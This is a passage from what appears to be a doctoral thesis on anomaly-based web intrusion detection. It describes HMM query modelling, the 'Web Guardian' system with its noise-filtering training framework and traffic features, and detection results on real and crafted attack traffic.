on the evaluation of FPR/DR on dataset D (average values over all splits).
Fig. 4.3 shows the performance of the proposed IDS for the option (1), either
with the query codication used in [Kruegel et al. (2005) (a)] or with the proposed
codication. As we can see, the proposed query codication is really eective to
heavily reduce the false alarm rate. In particular, we computed IDS performance
for dierent values of α, as in real scenarios we cannot rely on a reliable estimation,
but only on raw estimates. On the other hand, with a little expense in terms of false
alarm rate, a positive value of α denitely enhance the detection rate of attacks.
It is evident that a precise value is not necessary, because even with a relatively
large value, i.e.α ∼ 3% (we know that attacks are about the αi∗ ' 1%), we are
able to both detect 96% of attacks, and raise a fraction of false alarms lower than
1%. The point α = 0 identies IDS performances when we are fully condent on the
legitimacy of the training queries, as in [Kruegel et al. (2005) (a)]. It is evident that
for the proposed query codication, the lowest amount of false alarms is obtained
(about 0.4%), but a signicant part (about 15%) of attacks inside D cannot be
detected. However, it is fundamental to spot these attacks, as they may light out
vulnerabilities in web applications which are currently exploited.
The proposed codication is advantageous also in terms of learning time: just

168 minutes against 214 (on a computer with CPU Intel CoreDuo2 8100@2.1Ghz,
2GB RAM, O.S. Linux). Anyway, the learning time doesn't aect IDS performances,
as training is made o-line.
Results obtained with a single HMM, are compared with those obtained while
using 3, 5 and 7 HMM per ensemble in g. 4.4. For small values of α, if the number
of HMM per ensemble increases, there is an improvement of performance. This is a
reasonable result, because using more models the IDS is able to better modelling the
information inside the training set. However, the improvement of performance is not
as large as we expected. This because the proposed query codication (sec. 4.3.1),
which simplies the learning task for HMM, reduces the advantages of modelling a
generic sequence using multiple HMM. In fact, in some preliminary experiments we
performed using the codication used in [Kruegel et al. (2005) (a)], the improve-
ment of performance of multiple HMM was larger. Moreover, as the value of α
increases, the 4 curves become more close each other. This may be explained if
we note that the increasing of α can lead to a heavy modication thresholds (in a
complex relationship), which may overwhelm advantages of a more thorough com-
putation of the query probability.
4.4. Web Guardian 71
4.4 Web Guardian

Web Guardian adopts a multi-model approach to the detection of malicious web re-
quests. Multiple features are extracted from web requests and each one is modeled
separately. Web Guardian collects such features from a large set of web requests. A
substantial part of these requests may be considered as legitimate, i.e. performed
by normal users during their browsing experience. However, a small part of these
requests may be performed for malicious purposes, e.g. by exploitation tools con-
trolled by miscreants. In order to cope with such a noise, we present a general
learning framework which can be applied to every statistical model. This frame-
work allows for an automatic cleaning of the training set. This method is based
on a reasonable assumption: the noise is represented by outlier patterns. On the
other hand, if this is not the case, such noise cannot (signicantly) aect the model
selection phase. This under the assumption that a substantial part of patterns is
representative of legitimate behavior.
Now, it is worth noting that this assumption may not be valid for all features.
Some features may not be present in all web requests. As an example, even if we
consider a large number of web requests (e.g. one million), it is possible that a
web application receives only few queries (e.g. 3 queries). In the worst case, these
few queries may be performed by an attacker instead of a legitimate user. Thus,
it is important to keep track of the number of training samples for each model. It
reects how much the training set may be assumed as representative of legitimate
behavior. As a consequence, it tells us something about the reliability of the model
output. On the other hand, an operator may inspect those features having a very
low number of training samples. Due to the relatively low number of such samples,
this is not an expensive task.
This Section is organized as follows. Section 4.4.1 presents the proposed learning
framework. In that Section we also outline the limits of the framework. Section 4.4.2
describes the general models we adopt to describe web trac features. In Section
4.4.3 we present and motivate all features which are currently employed by Web
Guardian. The key components of the architecture of Web Guardian are described
in Section 4.4.4. Then, in Section 4.4.5 we present some preliminary experimental
results. These results are very promising, and clearly highlight that Web Guardian
may signicantly improve the security of web services. However, Web Guardian is
still a work-in-progress: we are improving it and we are studying new functionalities.
In Section 4.5 we discuss about current limitations and future work.
4.4.1 General learning framework

In general, anomaly-based intrusion detection for computer systems may be formu-
lated as an one-class classication (a.k.a. outlier detection) task. This task needs
real data in order to build a model of the legitimate activity (target class) in com-
puter systems, and then spot every pattern not belonging to such a class, i.e. an
outlier (attack) pattern. To this end, it may be assumed that a substantial part of
data collected from computer systems is related to legitimate activity, since outlier
patterns (noise) are typically rare events. However, the presence of outlier patterns
may not be avoided, because the size of the data set makes the manual labeling of
outlier patterns very dicult or expensive. Also, due to the complexity of patterns,
well-known outlier detection techniques may not be suitable.
Unfortunately, outlier patterns may signicantly aect classier's performance
during the operational phase [Cretu et al. (2008)]. Moreover, such outlier patterns
might be deliberately generated by an adversary [Barreno et al. (2006)]. In this case
we refer to adversarial learning, since such malicious outlier patterns are aimed at
introducing persistent classication errors.
In this section, we present a general learning framework, that may be applied
to every statistical model, including all general models employed by Web Guardian.
The algorithm provides for an automatic ltering of noise inside the training set.
Furthermore, we study the limits of our framework, by dening the necessary condi-
tions that noisy patterns must meet for introducing errors in the target (legitimate)
class model.
4.4.1.1 Algorithm
Let us consider a training set SN = {x1 , x2 , . . . , xN } composed by N patterns. A

probabilistic model m is built using the entire set SN . Let p[X = x|m] be the
likelihood given by the model m to the pattern x ∈ SN . The training set can be
expressed as SN = TR ∪ OW , where TR is the set of the (R) target patterns and OW
is the set of the (W ) outlier patterns, and N = R + W .
Let index i be such that p[X = xi |m] ≥ p[X = xi+1 |m], i = 1, . . . , N − 1. We
obtain a monotonically decreasing function f (i) = p[X = xi |m] which represents
the likelihood value of the i-th pattern.
Under the assumption that the majority of patterns inside SN are target patterns
(R À W, for example R > 10W ), and since outlier patterns have some dierent
5
characteristic (i.e. feature values) w.r.t. target patterns , the expected outcome is
p[X = xt |m] > p[X = xo |m] ∀xo ∈ OW , ∀xt ∈ TR (4.3)
i.e. target patterns have higher likelihood than outlier patterns. If the condition
4.3 is satised, then there exists an index R such that TR = {x1 , x2 , . . . , xR }, and
OW = {xR+1 , xR+2 , . . . , xN }. Thus, the goal of one-class classication is to nd
the value of R (which is unknown) to separate target patterns from outlier patterns.
Now, let us dene the relative distance measure δ between two patterns xj and xk
as δ(xj , xk ) = |f (j) − f (k)|. In agreement with the notion of one-class classication,
the distance δ between a target pattern and a outlier pattern is expected to be
higher than the distance δ between any two consecutive target patterns (or any two
consecutive outlier patterns). This means that index R should satisfy:
δ(xR , xR+1 ) > δ(xj , xj+1 ) ∀j 6= R, j ∈ [1, N ) (4.4)
5
Otherwise, they may not be considered as outliers.
It is interesting to note that the distance measure δ(xj , xj+1 ), may be viewed
as a particular version of the well-known Local Outlier Factor (LOF) for
xj+1 [Breunig et al. (2000)].
If conditions (4.3) and (4.4) are satised, R∗ = R is the index j such that the
∗
distance δ(xj , xj+1 ) is maximum, i.e., R = arg maxj {δ(xj , xj+1 )}, j ∈ [1, N ). Of
∗ ∗ ∗
course, we must validate the obtained value R , by verifying that R >> W , where
W ∗ = N − R∗ . At this point a new model m0 may be trained using only patterns
x1 , . . . , xR∗ . If the condition R∗ >> W ∗ is not valid, we may set an ad-hoc ag to
signal this exception. An operator may further inspect training patterns near the
threshold R∗ , to better understand the cause of the exception (e.g. it may be due
to a relatively low number of training samples).
4.4.1.2 Adversarial analysis of the algorithm
An adversary could produce well-crafted trac so that noisy patterns are produced
and either condition (4.3) or (4.4) are violated. If this happens, the system may
behave incorrectly, as outliers can be considered as targets (missed detection), or
targets may be considered as outliers (false alarms). In this section we express this
situation in terms of the a-posteriori probability of the model m, given such noisy
patterns.
Violation of condition (4.3) The a-priori probability for outlier and target pat-
terns can be estimated as p[X = xo ] = W/(W + R) and p[X = xt ] = R/(W + R),
respectively. Thus, applying the Bayes theorem, it is easy to see that the adversary
may attack the constraint in eq. (4.3) by submitting at least one outlier pattern xo
for which the model m has the following a-posteriori probability
R
p[M = m|xo ] ≥ min p[M = m|xt ]. (4.5)
W xt ∈TR
In such a case, the pattern xo is considered as target (missed detection). It is

clear that the adversary has two ways to achieve this condition: (a) increase the
number W of outlier patters w.r.t. the number of target patterns R; (b) increase
p[M = m|xo ] w.r.t. minxt ∈TR p[M = m|xt ].
Violation of condition (4.4) Given that constraint (4.3) is satised, if R∗ > R

(Case I) the system may behave incorrectly if R∗ > R (Case I), i.e. outliers may be
considered as targets (missed detection), or if R∗ < R (Case II), i.e. targets may be
considered as outliers (false alarms).
Case I. R∗ > R There exists an index j so that the distance δ between two
consecutive outlier patterns is higher than the distance between patterns xR and
xR+1 . In order to achieve Case II, the adversary has to submit outlier patterns with
dierent characteristics (otherwise, δ(xj , xj+1 ) = 0, ∀j ∈ [R + 1, N − 1]). Applying
the Bayes theorem, it is easy to see that Case I is possible only if
R
p[M = m|xR+1 ] > · p[M = m|xR ] (4.6)
2W
This condition is less restrictive than condition (4.5).
Case II. R∗ < R There exists an index j so that the distance δ between two
consecutive target patterns is higher or equal than the distance between patterns
xR and xR+1 . Applying the Bayes theorem, it is easy to see that in order to achieve
Case II, the adversary must generate at least one noisy pattern xo , for which:
R
p[M = m|xo ] ≥ (p[M = m|xR ] − φ) . (4.7)
W
where φ = max{P [M = m|xi ]−P [M = m|xi+1 ]}, i ∈ [1, R). Recall that if condition
(4.3)
t
is satised, p[M = m|xR ] = minxt ∈T p[M = m|x ]. It is worth noting that
R
condition (4.7) is easier to achieve w.r.t. condition (4.5).
The value of φ in some sense quanties how much target patterns are dissimilar
each other. The higher the value of φ, the easier for an adversary to achieve the
attack condition (4.7). On the other hand, in general, the lower the value of φ,
the more similar the feature values of target patterns, and the more dicult is for
an adversary to violate conditions (4.3) and (4.4), because minxt ∈TR p[M = m|xt ]
should increase. For this reason, a robust solution for one class learning may be
based on MCS, where each (one-class) classier of the ensemble is trained using a
set of features showing similar values over target patterns (i.e. low values for φ).
4.4.2 General models

Web Guardian currently employs three general models. These models, enumerated
as A, B, C, are described in the following Sections. Subsequently, we describe the
association between features and general models.
The same general model may be applied to infer the statistical prole of dierent
features. Depending on the extracted feature f, we may have a dierent number of
raw training samples N (f ). Since we apply the learning framework in Section 4.4.1
to each model, a small portion of N will be discarded. So, at the end of the training
phase, each model outputs the actual number number of employed training samples
(i.e. R∗ , see Section 4.4.1), as well as a probability threshold. This threshold is such
that all employed training samples are recognized as legitimate. For each model, we
keep track of R∗ as a reference index to evaluate its reliability.
4.4.2.1 Model A: sequence of symbols
Training This model is built from a training set SN = {x1 , x2 , . . . , xN }, where

each element is a sequence of symbols xi = [x1i , x2i , . . . , xli ] (l = l(i) is the length of
the i-th sequence). A sequence of symbols is described through an Hidden Markov
Model, according to the discussion in Section 4.3.4. We employ a single model, since
experiments in Section 4.3.7 showed that a HMM ensemble allows attaining only
a small performance improvement (in spite of an increased learning time). As in
HMM-Web, this model is built using the Baum-Welch algorithm [Rabiner (1989)].
Both the state transition and the symbol emission matrices are randomly initialised.
The dictionary of symbols is the overall set of distinct symbols encountered in train-
ing sequences. The number of states is given by the average number of unique
symbols of a sequence in the training set, rounded to the nearest greater integer.
We train the HMM on the (raw) training set SN . Then, in order to cope with
training set noise, we apply the algorithm described in Section 4.4.1.1. At the end
of this phase, a probability threshold for the model is set. This threshold is given by
the minimum probability among those assigned to (deemed as) legitimate sequences
within the training set SN .
Detection Given an observed sequence x, we obtain the most probable state

sequence by using the Viterbi Algorithm, as explained in [Rabiner (1989)]. Then,
the probability of the sequence p[x is legitimate|model-a] is given by combining state
transition and the symbol emission matrices, according to the most probable state
sequence and the sequence of symbols under analysis.
4.4.2.2 Model B: statistical distribution of a numeric value
Training This model is built from a training set SN = {x1 , x2 , . . . , xN }, where

each element is a non-negative integer value (xi ∈ N, xi ≥ 0). In general, the
higher xi , the higher the likelihood that it represents an outlier (attack). This
property allow us to employ a slightly modied version of the algorithm in Section
4.4.1.1, to speed up the noise ltering process. In practice, we redene the index
i so that xi ≤ xi+1 ∀i ∈ [1, N − 1] (i.e. pattern values are in ascendent order).
6
Then, we nd the index :
R∗ = arg max δ(xi , xi+1 ), where δ(xi , xi+1 ) = |xi − xi+1 |. (4.8)
i∈[1,N −1]
This index reects the number of (deemed as) legitimate patterns in the training
set. As described in Section 4.4.1.1, the index R∗ is validated by verifying that
R∗ >> W ∗ , where W∗ = N − R∗ . After this step, the new (ltered) training set
becomes SR ∗ = {x1 , x2 , . . . , xR∗ }. If condition R∗ >> W ∗ fails, an ad-hoc ag is
set, in order to signal this exception to an operator. The operator may further
∗
inspect training patterns having index close to R to understand the origin of this
exception.
∑
The model is based on the mean µ = R1∗ i∈[1,R∗ ] xi and the variance σ 2 =
1 ∑
i∈[1,R∗ ] (xi − µ) of values inside SR∗ . Using these parameters, we compute
2
R∗ −1
the probability of the maximum value within the set SR∗ (see next paragraph). This
will be the probability threshold of the model.
6
If multiple values for R∗ are found, we select the lowest value.
Detection During the detection phase, the probability of a certain value x is given
7
by :
{
σ2
p[x is legitimate|model-b] = p[|X − µ| ≥ |x − µ|] = (x−µ)2
if x≥µ+σ
p[x is legitimate|model-b] = 1 otherwise
(4.9)
This equation is obtained from the well-known Chebyshev inequality:
σ2
p[|X − µ| ≥ q] ≤
q2
q = x − µ considering the upper value for p[|X − µ| ≥ |x − µ|]. Moreover,
with
since p[|X − µ| ≥ |x − µ|] ≤ 1, it follows that the Chebyshev inequality should be
used only when x ≥ µ + σ . The same model is used in [Kruegel et al. (2005) (a)].
4.4.2.3 Model C: statistical distribution of symbols
Training SN = {x1 , x2 , . . . , xN } where each

This model is built from a training set
element is a symbol. We extract the set of all distinct symbols Ω = {ω1 , ω2 , · · · , ωK }
in the training set. For each distinct symbol ωi , we count the number of oc-
currences count(ωi ) in the training set. Occurrences are stored on the set O =
{count(ω1 ), count(ω2 ), · · · , count(ωK )}. The lower the number of occurrences of a
symbol in the training set, the higher the likelihood that such a symbol represent an
outlier. Analogously to model B, in order to speed up the training process, for this
model we employ an ad-hoc version of the algorithm in Section 4.4.1.1. Let index j
be such that count(ωj ) ≥ count(ωj+1 ) ∀j ∈ [1, K − 1]. We nd the index :
8
R∗ = arg max δ(ωj , ωj+1 ), where δ(ωj , ωj+1 ) = |count(ωj ) − count(ωj+1 )|.
j∈[1,K−1]
(4.10)
This index reects the number of unique symbols (deemed as) legitimate in the
training set. The index R∗ is validated by verifying that
∑ ∑
count(ωj ) À count(ωj ). (4.11)
j≤R∗ j>R∗
That is, we verify that the great majority of symbols in the training
set is assumed as legitimate. After this step, we consider only symbols
having index lower or R∗ :
equal to Ωnew = {ω1 , ω2 , · · · , ωR∗ }, Onew =
{count(ω1 ), count(ω2 ), · · · , count(ωR∗ )}. Then, the probability of each distinct sym-
bol ωi is given by its relative frequency:
count(ωi )
p[x is legitimate|model-c] =∑ (4.12)
j∈[1,R∗ ] count(ωj )
7
Since large values should receive lower likelihood, we compute the probability that the random
variable X , having mean µ and variance σ 2 exceeds the x value.
8 ∗
If multiple values for R are found, we select the lowest value.
If the condition of eq. 4.11 is not valid, an ad-hoc ag is set, in order to signal
this exception to an operator. The operator may further inspect symbols in Ω
having number of observations close to R∗ , in order to understand the origin of
this exception. The probability threshold of this model is given by the minimum
probability among those assigned to symbols in Ωnew .
Detection Ωnew = {ω1 , ω2 , · · · , ωR∗ }

Let us consider the set of distinct symbols
and their occurrences O
new = {count(ω ), count(ω ), · · · , count(ω ∗ )}, obtained
1 2 R
during the training phase. The probability of a generic symbol x is given by:
{ count(x)
p[x is legitimate|model-c] = P
count(ωj ) if x ∈ Ωnew
j∈[1,R∗ ] (4.13)
p[x is legitimate|model-c] =0 otherwise
That is, we assign a non-zero probability only to symbols in Ωnew .
4.4.3 Modeled Web Trac Features

In this section we describe what features are currently modeled by Web Guardian.
Furthermore, we outline why the proposed features are useful to spot (and thus
protect) against malicious web requests.
We match each feature to one out of the three general models presented above.
In particular, during the training phase, we consider only successful web requests,
i.e. requests receiving a response status 2xx or 3xx[RFC 2616 (1999)].
4.4.3.1 Web applications
For each web application query, we extract (a) the sequence of attributes and (b) for
each attribute, the sequence of input characters. As made in HMM-Web, attribute
inputs are processed so that every digit and every letter are substituted by the
special characters N and A, respectively (see Section 4.3.1). Therefore, for each web
application
• we instantiate a model A to describe the legitimate sequence of attributes.
• for each attribute of the application, we instantiate a model A, to describe the

legitimate sequence of input characters.
As evidenced by HMM-Web, these features allow detecting input validation at-

tacks with very high detection rate and very low false positive rate. However, con-
trary to HMM-Web, we do not perform fusion between the output of various models.
Our aim is to employ the output of each model as an anomaly sensor, that gives a
specic information regarding the input query. Moreover, contrary to HMM-Web,
Web Guardian acquires web application inputs provided by POST requests also.
In this case, they are enclosed on the message body of the HTTP/HTTPS request
[RFC 2616 (1999)].
For each distinct source IP address, we group web application queries using an
inter-request time threshold t. Within a group, the time interval between each query
and its subsequent is lower or equal to t. For each group we extract the number
of queries. By modeling the average number of queries per group, we may detect
automated requests on web applications. To this end, we adopt model B. It is worth
noting that, the raw training set for the model is obtained considering all groups, for
all source IP addresses. That is, the distinction between IP addresses is used only
to dene each group. Automated requests may be used by attackers to perform
password guessing or attacks or some automated vulnerability assessment. Some
of these attacks require a relatively high number of requests per unit of time, in
order to be eective. In this case, the number of queries per group is expected to
be higher with respect to that of typical users. With this feature we aim to detect
such anomalous events. During the detection phase, we compute the number of web
application queries within the group of the current query (if any). Then, we submit
this value to the model in order to assess if it is anomalous (too high).
4.4.3.2 Method and HTTP Version
For each web request we extract the method and the http version eld. Attackers
may issue web requests with less common methods, e.g. OPTIONS or TRACE to
gain information about the target web server. Also, automated tools for web server
ngerprinting issue non existent methods, to get information from the web server's
reply. Thus, requests having non-typical methods are clearly suspect. Similarly,
the HTTP Version eld receives a very limited range of values by web browsers.
Therefore, a non conventional value for this eld is clearly suspect.
We employ a model C for modeling both method and http version features.
Each distinct string is considered as a distinct symbol by the model. For example,
the method string GET and GeT are considered as dierent symbols. Similarly, the
HTTP version strings HTTP/1,1 and HTTP/1.1 are viewed as dierent symbols by
the model. During the detection phase, we submit the current request method and
HTTP version to their corresponding models.
4.4.3.3 Request headers
By means of request headers, web servers acquire some additional input. Depending
on this input, the web server's reply (and the returned informative content) may
change substantially. For example, the Cookie header is typically submitted by web
browsers for authentication, once a user logs on a website. The input string for this
header is typically processed by a web application to authenticate a web request.
Thus, a validation vulnerability on the Cookie input string may be exploited by an
attacker to compromise web applications. This is the so-called Cookie manipulation
attack [CGIsec]. Also, attacks are often carried by submitting malicious input in the
User-Agent header [Ollmann (2008)]. Anyway, the key point is that each header
input should be inspected. It may be processed by a vulnerable web browser, and
maybe by a vulnerable web application.
For each header, we extract:
• input length When malicious input is injected, its length is typically higher
than legitimate input (this is denitely true for buer overow attacks). Thus,
this straightforward feature may eectively detect malicious requests. We
model this feature by means of an instance of model B for each header.
• non-alphanumeric input characters Malicious input typically pregures

the insertion of unconventional meta-characters, i.e. characters that are se-
mantically dierent with respect normal input. That is, a well crafted input
using these characters may change (maliciously) the behavior of the web server,
web applications or web browser that will retrieve the generated page. These
characters are typically non-alphanumeric. Thus, for each request header, we
identify the set of (distinct) non-alphanumeric input characters. By identify-
ing legitimate non-alphanumeric input characters, we may spot any attempt
to submit malicious input that requires unconventional non-alphanumeric
characters. To this end, we employ model C, for each request header. For
each training request and header, the set of (distinct) non-alphanumeric input
characters is included in the training set for the header. That is, characters
that are present more than once in the training set are associated to distinct
web requests. In such a way, we avoid the poisoning of the training set with
few requests having a lot of malicious non-alphanumeric characters. On the
other hand, we may assume that a substantial part of training web requests
are legitimate. During the detection phase, for each header of the current
request we extract the set of distinct non-alphanumeric input characters. We
analyze each one by means of the header-specic model. Then we signal all
input characters having probability under threshold.
• digit/alphabetic input characters Excluding non-alphanumeric charac-

ters, some request headers typically receive numeric values only (e.g. the
header Content-length), some others may receive letters only (e.g. the header
Host, assuming that the website's domain name is composed by letters and
non-alphanumeric characters, e.g. www.example.com). For this reason, for
each header, we dened two types of ag: flagd={Digits, NoDigits} and
flagl={Letters, NoLetters}. flagd is used to signal whether the input
string contains digits or not. Contrary, flagl is used to signal whether the
input string contains letters or not. Thus, we may identify if a header receives
only digits or only letters (i.e. if mostly we have only the rst ag true and
the other is false, and vice versa). We may spot malicious input that submits
letters in spite of digits and vice versa (e.g. Content-length: bad input).
To this end, for each request header encountered in training requests, and
each ag type, we instantiate a model C. The training set of this model con-
tains a symbol (ag value) for each header input. During the detection phase,
for each header in the current request we determine the value for flagd and
flagl. Then, we submit these values to the corresponding models, to assess
if the header input has some anomalous digit and/or letter character. If so,
we signal an anomaly for the header input.
Finally, we extract the sequence of headers. We use model A to describe the

legitimate sequence of headers in a web request. This model is useful to signal
unconventional headers or a suspect order for known headers (e.g. due to requests
performed by automated tools). For each training request, we extract the sequence
of headers (i.e. a training sample for the model). We employ a special sequence
to take into account requests without headers (e.g. following HTTP version 0.9
specications). During the detection phase, we extract and analyze the sequence of
headers in the current request.
4.4.3.4 Ratio between rejected and total requests
For each distinct source IP address, we group web requests using an inter-request
time threshold t. Within a group, the time interval between each request and its
subsequent is lower or equal to t. Then, for each group of requests we compute
the ratio between rejected and total requests. We consider as rejected all requests
receiving response code dierent from 2xx and 3xx [RFC 2616 (1999)]. This feature
is useful to spot exploitation tools, while they are trying to nd web applications with
well-known vulnerabilities, or resources with common names (e.g. INSTALL.txt,
index_old.php). These attempts typically cause the server to reject many requests
within a small time interval.
This feature is described through model B. The training set is made up by ratio
values in each group of training requests, for all source IP addresses. During the
detection phase, we compute the ratio between rejected and total requests within
the group of the current query. Then, we submit this value to the model in order
to assess if the ratio is anomalous.
4.4.4 Architecture
Figure 4.5 shows the architecture of Web Guardian with focus on the training and
detection phase. These two phases may overlap, since Web Guardian has a multi-
thread implementation. This is important, because web services are constantly in
evolution, and Web Guardian may be (re)trained in order to keep its models up
to date. Until this process is not completed, our system may continue providing
real time protection. Our system currently supports the protection of the Apache
web server version 2.x (http://httpd.apache.org/docs/2.0/). We added some
9
code into Modsecurity WAF (version 2.5.7 ), in order to introduce some useful
functionality. Our version of Modsecurity can store each (eld of a) web request
and the header of the web server response into a MySQL database
10 .
9
At the time we are writing, Modsecurity reached version 2.5.12. However, it is easy to patch
latest versions with our code.
10
To this end, it is also possible to install a specic Apache module. However, due to some
constraints, we preferred to implement such a functionality in Modsecurity.
The central controller represents the core of Web Guardian. The central con-
troller is able to launch and stop dierent (concurrent) threads. Three types of
thread are currently supported: (1) a learning thread, (2) a training set analysis
thread and (3) a real-time detection thread. The learning thread acquires a set of
requests from the database and produces the set of legitimate trac models (one
for each modeled feature). The training set analysis thread employs the current
models to analyze requests employed during the training phase. This is useful to
make sure that the models did not (erroneously) discard relevant samples. Finally,
the real-time analysis thread loads current models and performs real time analysis
of incoming web requests. It may also perform some predened counteraction, once
a suspect web trac is detected.
We may interact with Web Guardian (i.e. the central controller) through a
web-based graphical interface. Through this interface we may send commands (or
queries) to the central controller, which in turn replies with the requested informa-
tion. For example, we may launch one of the threads mentioned above. Also we
may check their status (e.g. progress, errors etc.). If false alarms are found we may
ask Web Guardian to update the model(s) which erroneously raised the anomaly.
The model update may be performed by either changing the probability threshold
or (re)training the model, including more samples (i.e. previously discarded by the
learning framework). In such a way, also similar false alarms are switched o.
4.4.5 Experiments
In order to evaluate the performances of Web Guardian, we installed our version
of Modsecurity in a production web server of our academic institution. This web
server was dedicated to support a web portal, with a number of web applications.
We collected real web trac on this web server for about a week. Due to the
relevant number of users accessing the portal these few days were sucient to gain
an high number of web requests. Table 4.2 shows main characteristics of the collected
dataset. Let us refer to this dataset as Λ. The dataset Λ contains about a week of
trac, and accounts for about 450,000 requests. About 100,000 of such requests
(i.e. 22%) are associated to web application queries.
We subdivided dataset Λ in two datasets: Σ composed by the rst 200,000 re-

quests of Λ and T containing all remaining requests. Dataset Σ have been used to
11
train our detection system . To this end, we employed a computer with CPU Intel
CoreDuo2 81002.1Ghz, 2GBytes of RAM, and Linux (Ubuntu 8.04) Operating Sys-
tem. The training phase required 2 hours and 53 minutes, and a peak of 1.6GBytes
of used RAM. According to the proposed learning framework (see Section 4.4.1),
the training phase required no supervision (and any ad-hoc setting of parameters).
A the end of the training phase, we evaluated the eectiveness of the learn-
ing framework in Section 4.4.1. To this end, we spotted attacks inside the dataset
11
In is worth noting that we may not randomly split dataset Λ. This because some features
depend on the sequence of requests during the time.
Λ with the help of our system

12 . This task has been performed in a way simi-
lar to HMM-Web. In particular, we proceeded as follows. For models having a
relatively large number of samples, we manually inspected samples receiving the
lowest likelihood. Contrary, for models having a relatively low number of samples,
we manually inspected all samples. On the basis of our experience and by using
known-as-legitimate inputs
13 as reference, we manually labelled all attacks in Λ.
Now let us recall the key reasons for this approach.
For models built using a relatively high number of samples (e.g. a thousand),
there is a good chance that a substantial part of samples is related to legitimate be-
havior. This means that malicious samples are expected to receive lower probability
with respect legitimate samples. Recall that bad guys are typically in lower number
with respect to legitimate guys. On the other hand, known web exploits typically
show very dierent features with respect to legitimate requests. Thus for models
receiving a relatively high number of samples, we expect that they substantially
describe legitimate behavior.
This reasoning is not valid for models having a little number of training samples
(e.g. 20). In the worst case, these samples may be all related to attacks. Thus, a
manual inspection of all samples is necessary.
Overall, we found 232 attacks in Λ. We labelled as legitimate all other web

requests in Λ. Surprisingly, our learning framework allowed Web Guardian to detect
(autonomously) all attacks inside the set Λ. A portion of them (102 attacks), was
among the requests employed to train Web Guardian (Σ ). On the other hand, Web
0.28%) on set
Guardian raised a total of 1,252 false alarms (i.e. a false alarm rate of
Λ. 450 false alarms (0.22%, 150 false alerts per day) while
In particular, it raised
analysing its training set and 802 (0.32%, 267 false alerts per day) while analysing
the remaining requests (i.e. dataset T ). On average, Web Guardian currently takes
about 1.2 milliseconds to analyze a web request within Λ (response time).
To better evaluate the detection rate of our system, we built a set of malicious
web requests Φ against both web server and web applications of the portal. We
then evaluated how many of them were actually detected by Web Guardian. Our
malicious requests targeted input validation vulnerabilities (the typical and most
threatening vulnerabilities). These requests have been thoroughly suited to the spe-
cic conguration of web server and web application inputs. That is, we ideated
proof-of-concept attacks against the web portal, using a number of reference docu-
ments and known vulnerabilities (and of course, our expertise). It is worth noting
that these attacks have been crafted in order to highlight security vulnerabilities,
but without actually exploiting them.
Table 4.3 summarizes the key characteristics of the dataset Φ. Overall, it ac-
counts for 507 attacks against the web portal under analysis. For SQL Injection and
XSS attacks we used also some typical lter evasion techniques (see Section 4.1). We
12
Recall that due to the ad-hoc nature of web applications, we may not rely on signature-based
systems to perform this task.
13
We veried legitimate web application inputs by links contained inside web pages, by browsing
as a normal web user.
analyzed these well-crafted malicious requests with Web Guardian, and 505 (99.6%)
of them have been detected. On the other hand, these attack show features which
are denitely dierent from typical web requests. The (only) two attacks that have
not been detected were related to information gathering attempts, and highlight
some limitation of our system (see Section 4.5).
time interval 27 November - 3 December, 2009

number of web requests 447,178
distinct IP addresses 1,703
bad requests 5,507
web application queries 98,900
number of web applications 217
Table 4.2: Overview of the key characteristics of the dataset Λ employed to evaluate
the performance of Web Guardian.
4.4.5.1 Discussion
Table 4.4 outlines the performances of Web Guardian, in terms of (a) detection, (b)
false alarm rate and (c) average response time per request, evaluated on datasets Λ
and Φ.
Our results clearly highlight that Web Guardian is able to accurately spot attacks
even if they are included in the set of requests used for training. We detected all
attacks encountered in the wild (i.e. within dataset Λ) and almost all our custom
attacks in the dataset Φ. Thus, our results clearly evidence that Web Guardian has
excellent detection performances. Moreover, its response time is signicantly low
(considering that we did not optimized the code of Web Guardian). In addition,
Web Guardian generates a very low false positive rate (0.2-0.3%). Nevertheless, the
number of false positives per day may be relevant, especially for popular websites.
For the dataset under analysis, by analyzing the set of requests not employed for
training we obtained on average 267 false alerts per day. This value is slightly
higher with respect to the number false alarms we have by analyzing the set of
training requests. This is reasonable, since we used a limited statistical sample of
web requests. In fact, reducing the memory needed by our system (i.e. optimizing
the implementation), we could use a higher statistical sample.
It is worth to note that a signicantly lower false positive rate may be attained
by manually verifying false alarms on our web interface. Using such a interface we
may:
• group anomalies depending on their type: i.e. what is the model which raised
the anomaly, common traits of the anomaly (e.g. a suspect non-alphanumeric
character), source IP address, targeted web application/header
Target Details Attack Type References Number

of Attacks
web ap- 90 distinct web appli- cross-site scripting, sql [Spett (2002)] 412
plication cations and 372 at- injection, remote code [Admin (2002)]
queries tributes execution, remote le [Mac Vittie (2007)]
inclusion, information [Hansen (2009)]
gathering [Pastor (2009)]
[Auger (2010)]
[L0t3k]
headers Accept, generic buer overow, [Bellamy (2002)] 78

Accept-Language, cross-site scripting, sql [PSS (2002)]
Referer, injection, http request [Linhart et al. (2005)]
Content-Type, smuggling, CRLF injec- [Symantec (2006)]
Accept-Encoding, tion [CAPEC (2007)]
User-Agent, Host, [Bajpai (2009)]
Content-Length, [Mac Vittie (2010)]
Connection,
Cache-Control,
Cookie, Via,
X-Forwarded-For,
If-Modified-Since
method PROPFIND, buer overow, cross- [Donaldson (2002)] 12
OPTIONS, TRACE site scripting, informa- [Juniper (2002)]
and bad strings tion gathering [Manion (2003)]
[Shah (2004)]
http ver- bad format string buer overow, infor- [Donaldson (2002)] 5
sion mation gathering [Shah (2004)]
Table 4.3: Overview of the attacks performed against the website under evaluation
(dataset Φ).
Parameter Dataset Value

Λ=Σ∪T 232 attacks out of 232, 100%, ∼39alerts/day
detection rate
Φ 505 attacks out of 507, 99.6%
Λ 1,252alerts/447,178reqs, 0.28%, ∼209alerts/day
false alarm rate Σ 450alerts/200,000reqs, 0.22%, ∼150alerts/day
T 802alerts/247,178reqs, 0.32%, ∼267alerts/day
response time Λ 1.2 milliseconds
Table 4.4: Overview of the performaces of Web Guardian evaluated on datasets Λ

and Φ. Web Guardian has been trained on Σ (the rst 200,000 requests of Λ).
4.5. Limitations, proposed solutions and future work 85
• adjust model thresholds, so that attacks may be still reliably evidenced and
false alarms are reduced
• (re)train models using some samples which have been erroneously discarded
by the learning framework (e.g. because there were no attacks in the set of
training samples)
For example, with few clicks (ten minutes of work), by manually adjusting model
thresholds, we reduced the total number of false alarms from 1,252 to about 40014 .
Through the web interface we may also dene the association between anoma-
lies and counteractions. A dierent counteraction may be specied, depending on
anomaly type(s), output probabilities of models and their reliability
15 . This part is
critical to some extent, since we have to make sure that legitimate trac is never af-
fected by Web Guardian. So we may provide for strong counteractions (e.g. drop the
